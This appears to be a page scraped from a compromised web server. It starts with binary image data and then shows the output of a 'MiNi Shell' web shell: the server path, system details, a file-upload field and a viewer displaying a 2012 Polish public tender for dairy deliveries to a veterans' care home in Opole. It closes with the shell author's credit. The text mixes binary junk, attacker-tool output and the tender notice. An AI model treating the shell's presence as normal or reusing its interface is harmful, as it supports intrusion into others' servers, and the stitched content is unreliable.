JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120118/17104-N-2012.html

<p class="kh_header"><b>Opole: Sukcesywna dostawa mleka i przetworów mleczarskich, oraz tłuszczy do    do Domu Pomocy Społecznej dla Kombatantów 
 ul. Chmielowicka 6, 45-738 Opole .</b><br>
<b>Numer ogłoszenia: 17104 - 2012; data zamieszczenia: 18.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej dla Kombatantów w Opolu , ul. Chmielowicka 6, 45-738 Opole, woj. opolskie, tel. 0-77 4743697, 457 54 95, faks 0-77 4743697, 457 54 95.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dps.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa mleka i przetworów mleczarskich, oraz tłuszczy do    do Domu Pomocy Społecznej dla Kombatantów 
 ul. Chmielowicka 6, 45-738 Opole ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa   mleka i przetworów nabiałowych oraz tłuszczy do Domu Pomocy Społecznej dla Kombatantów  ul. Chmielowicka 6,45-738 Opole w ilościach i asortymencie zawartym w załączniku do SIWZ tj formularzu  rzeczowo - cenowym tj. :

1.Mleko 2% tłuszczu UHT  w kartonie- 1l-   ilość   560 szt.
2.Mleko 2% tłuszczu - (pakowane w worek  5 litrów, 10litrów)   -  ilość   19000 litr 
3.Masło roślinne 80%tłuszczu kostka 250g-  ilość     45  kg
4.Margaryna mleczna zawartość tłuszczu od 75% do 80% kostka 250g  - ilość  600 kg 
5. Jogurt naturalny  konsystencja jednolita w całej masie, gęsta bez grudek, tłuszczu, barwa jednolita biała do lekko kremowej smak i zapach: czysty, lekko kwaśny, aromatyczny, bez obcych posmaków i zapachów. Zawartość tłuszczu od 1,5% do 2,5% bez cukru. Opakowanie jednostkowe: kubki z folii polipropylenowej o masie 200ml zamykane platynką aluminiową termo zgrzewalną   - ilość  1200 szt.
6.Jogurt owocowy konsystencja, jednolita, kremowa bez grudek, lekko luźna, z widocznymi kawałkami owoców użytych do produkcji, barwa naturalna charakterystyczna dla użytych owoców, smak i zapach- czysty, łagodny, słodko -kwaśny, smakowo właściwy dla owoców będących składnikiem jogurtu minim 5% owoców, zawartość tłuszczu w samej masie nie mniej niż 1,5% do 2,5%. Opakowanie jednostkowe: kubek z tworzywa sztucznego o masie 150 ml    - ilość 1100 szt.
7.Jogurt owocowy bez cukru  light 150ml dopuszcza się użycia słodzika np: słodzony aspartanem - ilość  360  szt. 
8.Ser żółty twardy minim. 45%tłuszczu typu: Gołda, Edams/ki- bloki 0,5- 2,5kg lub równoważny do sera goudy tz:ser twardy, o złocistej barwie, z niewielkimi oczkami o łagodnym smaku  - ilość  270kg.
9.Ser topiony naturalny kremowy; barwa naturalna, smak i zapach charakterystyczny dla odpowiedniego sera naturalnego kl. I, z którego wyprodukowano ser topiony, ze swoistym posmakiem topienia, 100g kostka- czysty. Zawartość tłuszczu w  masie ogólnej mniej niż 27% tj.60% w suchej masie. opakowanie folia aluminiowa kształt prostokątny.  ilość 230 kg 
10.Serek naturalny125g  o konsystencji pasty o niskiej zawartości tłuszczu do 5% ilość 2480szt.
11.Serek homogenizowany waniliowy  150g - ilość  2700 szt.
12.Twarożek grani 180g kubek  zawartość tłuszczu od3% do 5% składa się ze specjalnie termicznie obrobionych ziarenek twarożku w delikatnej pasteryzowanej śmietance o konsystencji granulowanej gęstej - ilość  - 2350 szt.
13. Śmietana 12% tłuszczu do zup i sosów  400ml opakowania -  1500 szt.
14. Śmietana 18%  tłuszczu kwaśna- 400ml  - ilość 1100 szt.
15.Kefir luksusowy- naturalny o zawartości tłuszczu od 0,5%do 2,5% opakowanie - 0,4l kubek z folii polipropylenowej zamykane platynką aluminiową termozgrzewalną ilość  1500 szt 
16. Twaróg - krajanka półtłusty klasa I o zawartości tłuszczu w suchej masie minimum 15% jest to ser twarogowy niedojrzewający wyprodukowany z mleka pasteryzowanego. Barwa biała do lekko kremowej jednolity w całej masie opakowanie od 0,70kg do 1,00kg  ilość  1130 kg.
17. Maślanka naturalna 1,5% tłuszczu PN-A-86061; konsystencja płynna, jednolita w całej masie bez grudek tłuszczu, barwa jednolita biała do lekko kremowej, smak i zapach: lekko kwaśny, aromatyczny, orzeźwiający bez obcych posmaków. Zawartość tłuszczu 1,5%. Opakowanie jednostkowe  o pojemności 0,4l kubek z folii polipropylenowej zamykane platynką aluminiową termozgrzewalną ilość  950szt. 
18. Twaróg  półtłusty klasa I o zawartości tłuszczu w suchej masie minimum  15% jest to ser twarogowy niedojrzewający wyprodukowany z mleka pasteryzowanego. Barwa biała do lekko kremowej jednolity w całej masie opakowanie kostka200g hermetycznie zamknięte  ilość  100 kg .
19.Masło extra 82% tłuszczu 0,2kg nie solone  ilość 1840 kg
									
2.1. W zakresie przedmiotu zamówienia, Zamawiający wymaga, by :				
1)Oferowane produkty były  dopuszczone do obrotu i spełniały wymagania określone w ustawie o warunkach zdrowotnych i żywienia ( Dz.U Nr 31 poz 265 z 2005 )
2).Oferowane produkty powinny być wysokiej jakości bez zanieczyszczeń mikrobiologicznych i bakterii chorobotwórczych. 
3)Mleko powinno pochodzić z bieżącej produkcji, posiadać termin przydatności do spożycia w chwili dostawy nie krótszy  niż 5 dni przed jego upływem.
4)Artykuły powinny być dostarczane w opakowaniach detalicznych o gramaturze nie niższej niż przewidziana w formularzu rzeczowo -cenowym  stanowiącym załącznik nr  2 . do SIWZ
5)Każde opakowanie powinno zawierać nazwę i adres producenta, klasa jakości, datę produkcji, datę przydatności do spożycia, warunki przechowywania. Wymagane jest aby okres przydatności do spożycia dostarczonych przez Wykonawcę przetworów mleczarskich w dniu  ich odbioru przez Zamawiającego, wynosił minimum połowę okresu przydatności do spożycia przewidzianego dla danego zakupu.
6)Warunki transportowe muszą być zgodne z zasadami GMP GHP, do wglądu książeczka mycia i dezynfekcji pojazdu oraz książeczka zdrowia kierowcy, powinien posiadać na sobie czysty fartuch.
7)Wszystkie dostarczane produkty posiadały odpowiednie atesty, HDI (handlowe dokumenty identyfikacyjne), a ponadto produkty przetworzone spełniały normy związane ze Zintegrowanym Systemem Zarządzania HACCP.
8)Dostawa mleka  następowała do jego siedziby w  dniach od poniedziałku do soboty  od godz. 6.00 do godziny 6.30, a pozostałe artykuły  mleczarskie od poniedziałku do piątku od godz. 10.00 do 14.00. 
9)Mleko dostarczane do magazynu spożywczego zamawiającego winno być fakturowane na osobnym dokumencie dostawy, niezależnie od pozostałych dostaw asortymentów przetworów mleczarskich dostarczonych w  tym samym dniu dostawy co dostarczone  mleko.

Przedmiot zamówienia będzie zamawiany partiami, które w treści umowy określane są jako jednorazowe zamówienie, w zależności od aktualnych potrzeb zamawiającego.
Wielkość jednorazowego zamówienia zostanie każdorazowo uzgodniona telefoniczne lub poprzez pisemne zgłoszenie w terminie do 2 dni przed odbiorem licząc od chwili zgłoszenia faksem  od zamawiającego lub według ustalonego harmonogramu, a w sytuacjach szczególnych, na żądanie zamawiającego, także poza tymi dniami.


Zamawiający zastrzega, że wielkość przedmiotu zamówienia oraz wartość umowy może ulec
zmniejszeniu , stosownie do faktycznych wielkości dostaw, przy zachowaniu cen podanych w
ofercie.

Wykonawca zamówiony towar będzie dostarczał do siedziby Zamawiającego własnym transportem zgodnie z wymogami określonymi w Ustawie z dnia 25.08.2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006 r. nr 171 poz. 1225) wraz z odpowiednimi aktami wykonawczymi. 
Warunki transportu muszą być zgodne z zasadami GMP GHP ( GMP jest Dobra Praktyka Produkcyjna obejmująca działania mające na celu, aby produkcja żywności, oraz wyrobów przeznaczonych do kontaktu z żywnością odbywała się w sposób zapewniający bezpieczeństwo żywności, zgodnie z przeznaczeniem; GHP- dobra praktyka Higieniczna obejmuje działania związane z warunkami i środkami podejmowanymi celem zapewnienia produkcji bezpiecznej żywności na wszystkich etapach produkcji).

W przypadku niezgodności dostawy z zamówieniem, zamawiający ma prawo zgłoszenia
reklamacji telefonicznie, a wykonawca zobowiązany jest do natychmiastowej jej wymiany na towar   o cechach organoleptycznych poszczególnych asortymentów  zgodnie z ustawą z 25 sierpnia 2006 r o bezpieczeństwie żywności i żywienia,oraz zgodny z żądanym przez Zamawiającego asortymentem wymienionym w formularzu rzeczowo - cenowym  . Zamawiający wymaga by dostarczany asortyment był zgodny z  w zakresie przedmiotu zamówienia oraz  ilości zamawianych asortymentów  z zachowaniem żądanej przez Zamawiającego  formy opakowania jednostkowego oraz o  o cechach organoleptycznych wskazujących na przydatność asortymentu  do spożycia .
Przez cechy organoleptyczne przedmiotu zamówienia rozumie się zespół cech obejmujących smak, zapach, wygląd, w tym barwę i konsystencję środków spożywczych, które można wyodrębnić i ocenić za pomocą zmysłów człowieka.												
Zamawiający zastrzega, że wielkość przedmiotu zamówienia oraz wartość umowy może ulec zmniejszeniu, stosownie do faktycznych wielkości dostaw, przy zachowaniu cen podanych w ofercie  bez prawa roszczeń z tego tytułu przez Wykonawcę. 
Zamawiający w trakcie realizacji umowy może dokonać  drobnych przesunięć   asortymentu , według bieżących potrzeb i celowości zakupu, przy czym ogólna wartość przedmiotu zamówienia nie przekroczy kwoty zapisanej w umowie. Wykonawca będzie realizował dostawy (zamówienie) po  stałych cenach jednostkowych zawartych w ofercie. Zamawiający  dopuszcza w sytuacji zmiany wielkości opakowania przez producenta  możliwość przeliczenia ceny jednostkowej   na jednostkę  miary..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-3, 15.51.10.00-3, 15.51.00.00-6, 15.53.00.00-7, 15.54.00.00-5, 15.55.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żada wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania  braku podstaw do wykluczenia z postępowania o udzielenie zamówienia 	publicznego Wykonawcy w okolicznościach o których mowa w art. 22 ust.1 pkt 1 ustawy 	Pzp. Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z 	postępowania, zgodnie z  wzorem ( propozycją) oświadczenia stanowiącym załącznik do 	 specyfikacji Istotnych Warunków Zamówienia ( SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy składając ofertę muszą spełnić ( w przypadku wspólnego ubiegania się o 	udzielenie zamówienia przez dwóch  lub więcej Wykonawców o udzielenie niniejszego 	zamówienia, oceniane będzie ich łączna wiedza i doświadczenie) warunek  posiadania 	wiedzy i doświadczenia, polegający  na wykazaniu się w okresie ostatnich trzech  lat przed 	upływem terminu składania ofert a jeśli okres prowadzenia działalności jest krótszy- w tym 	okresie, należycie wykonanymi  minimum jednej  dostawy ( dostawa realizowana na 	podstawie jednej umowy) odpowiadających swoim rodzajem dostawom stanowiącym 	przedmiot zamówienia, tj. sukcesywne dostawy  mleka i przetworów mleczarskich, oraz 	tłuszczy    na  kwotę co najmniej 120 000 zł brutto z podaniem ich wartości, przedmiotu, 	dat wykonania i odbiorców, oraz 	załączeniem dokumentu 	potwierdzającego, że 	dostawy zostały wykonane należycie lub 	są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach o których mowa w art.22 ust.1 pkt 3 ustawy Pzp. zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania zgodnie z wzorem ( propozycją) oświadczenia stanowiącego załącznik do niniejszej SIWZ.  oraz na podstawie przedłożonego przez Wykonawcę 	wykazu samochodów zgodnie z wzorem ( propozycją) załączoną do SIWZ  którymi Wykonawca dysponuje w celu realizacji zamówienia łącznie z ważnym zezwoleniem Inspektora Sanitarnego na środek transportu, służący przewożeniu artykułów spożywczych takich jak:    mleko i przetworów mleczarskich, oraz tłuszcze.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia o spełnianiu warunków określonych w art.22 ust.1</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia o spełnianiu warunków określonych w art.22 ust.1  W celu wykazania braku podstaw  do wykluczenia z postępowania o udzielenie zamówienia 	Wykonawcy w okolicznościach, o których mowa qw art. 22 ust.1 pkt 4 ustawy Pzp. 	Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z 	postępowania, zgodnie ze wzorem (propozycją ) oświadczenia  stanowiącym załącznik  do 	niniejszej SIWZ.
	
Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu, jeżeli:			
* z oświadczeń wykonawcy wynika, że:									
+  wykonawca spełnia warunki określone w art. 22 ust. 1 Ustawy Pzp,
+ wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego z
powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 Ustawy PZP.		

* dokumenty potwierdzają, brak podstaw do wykluczenia w oparciu o art. 24 ust. 1 Ustawy 	PZP    

* nie ujawni się żadna z przesłanek wykluczenia wykonawcy określona w art. 24 ust. 2 	ustawy PZP.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Formularz oferty wypełniony i podpisany przez wykonawcę.
	2.Formularz  rzeczowo cenowy wypełniony i podpisany przez wykonawcę.
	3. Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z 	przepisów prawa lub innych dokumentów rejestrowych ( upoważnienie  pełnomocnictwo).</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem postanowień z art. 144 ust.1 Ustawy Prawo zamówień Publicznych. W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić  od umowy w terminie miesiąca od powzięcia wiadomości o powyższych okolicznościach. Dopuszcza się zastosowanie innej stawki i wysokości należnego podatku VAT w przypadku zmiany obowiązujących w tym zakresie przepisów.
Poza przypadkiem o którym mowa wyżej stronom przysługuje prawo odstąpienia od umowy w następujących sytuacjach: 												
1.Zamawiającemu  przysługuje prawo odstąpienia od umowy, gdy
		a)  zostanie ogłoszona upadłość Wykonawcy, zostanie wszczęta procedura 			likwidacji Wykonawcy lub Wykonawca zakończy prowadzenie działalności 
		b) w przypadku wszczęcia  postępowania egzekucyjnego, skierowanego do 			majątku Wykonawcy,
		c) Wykonawca nie rozpoczął realizacji przedmiotu umowy bez uzasadnionych 			przyczyn, oraz  nie kontynuuje jej mimo pisemnego wezwania Zamawiającego.
		d) w razie dostarczenia przez Wykonawcę asortymentu o parametrach  				niezgodnych z wymaganiami  określonymi  przez Zamawiającego w SIWZ  w 			szczególności  opisanych w formularzy rzeczowo - cenowym , lub w przypadku 		niedokonania przez Wykonawcę wymiany asortymentu , dostarczanego 				niezgodnie z z wymaganiami Zamawiającego   w terminie  3 godz. 	liczonych  od przyjęcia reklamacji przez Wykonawcę .
		e) w razie dostarczenia asortymentu pochodzącego od innego producenta - 			niedeklarowanego w Ofercie przez Wykonawcę.
2.W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym,  czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiające może odstąpić od umowy w terminie miesiąca od powzięcia wiadomości o powyższych okolicznościach. W takim przypadku Wykonawca może żądać jedynie wynagrodzenia należnego z tytułu  wykonania części umowy.
3.Odstąpienie od umowy może nastąpić wyłącznie w formie pisemnej pod rygorem nieważności .
4.Wykonawcy przysługuje prawo odstąpienia od umowy, jeżeli:  Zamawiający nie wywiązuje się z obowiązku zapłaty faktur w terminie 4 tygodni od dnia, w którym upłynął termin zapłaty określony w  umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dps.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej dla Kombatantów, ul. Chmielowicka 6, 45-738 Opole.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2012 godzina 11:30, miejsce: Dom Pomocy Społecznej dla Kombatantów, ul. Chmielowicka 6, 45-738 Opole, sekretariat, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com